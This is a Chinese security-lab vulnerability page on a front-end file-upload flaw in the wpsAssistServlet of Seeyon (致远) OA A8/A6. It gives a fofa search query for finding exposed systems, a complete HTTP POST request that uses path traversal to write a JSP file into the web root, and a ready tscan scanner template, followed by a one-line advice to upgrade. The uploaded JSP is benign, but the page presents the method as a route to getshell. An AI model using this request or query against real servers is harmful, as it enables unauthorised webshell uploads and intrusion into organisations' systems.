致远OAwpsAsisstServlet 前台文件上传-漏洞文库小世界-安全文库-NGC660 安全实验室

致远OAwpsAsisstServlet 前台文件上传

一、漏洞详情

2022年护网期间公开漏洞显示致远OA前台存在文件上传漏洞可getshell

二、漏洞影响范围

漏洞影响的产品版本包括:致远A8、A6

三、漏洞复现

使用 fofa搜索
app=”致远A8”
漏洞链接:
http://x.x.x.x:82/seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1

m_f1f4557c44fc37aa32efdcfad3e0708c_r

poc:

POST /seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1 HTTP/1.1
Host: x.x.x.x:8099
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)
Gecko/20100101 Firefox/98.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,im
age/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,enþUS;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------120466775124259350661042728135
Connection: close
Cookie: JSESSIONID=C77EC989100FFE68041E88B49E6B38FF
Upgrade-Insecure-Requests: 1
Content-Length: 271

-----------------------------120466775124259350661042728135
Content-Disposition: form-data; name="upload"; filename="2.txt"
Content-Type: application/octet-stream

<%
 out.println("Hello Wor111ld!");
%>
-----------------------------120466775124259350661042728135--

burp:

m_6c7c71188072096c407409fb7ba8c955_r

成功上传:

m_c84d63c5eecc29b329e952a75a7aff97_r

tscan poc

params: []
name: "致远OAwpsAssistServlet前台文件上传"
set: {}
rules:
- method: POST
  path: /seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/pc1.jsp&fileId=1
  headers:
    Content-Type: multipart/form-data; boundary=---------------------------120466775124259350661042728135
  body: |2-

    -----------------------------120466775124259350661042728135
    Content-Disposition: form-data; name="upload"; filename="2.txt"
    Content-Type: application/octet-stream

    <%
     out.println("Hello Wor111ld!");
    %>
    -----------------------------120466775124259350661042728135--
  search: ""
  followredirects: false
  expression: response.status==200
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

m_92b21ae49c828de4c07802ee2176ac49_r

四、漏洞处置建议

尽快升级到最新版本。
请登录后发表评论

    请登录后查看回复内容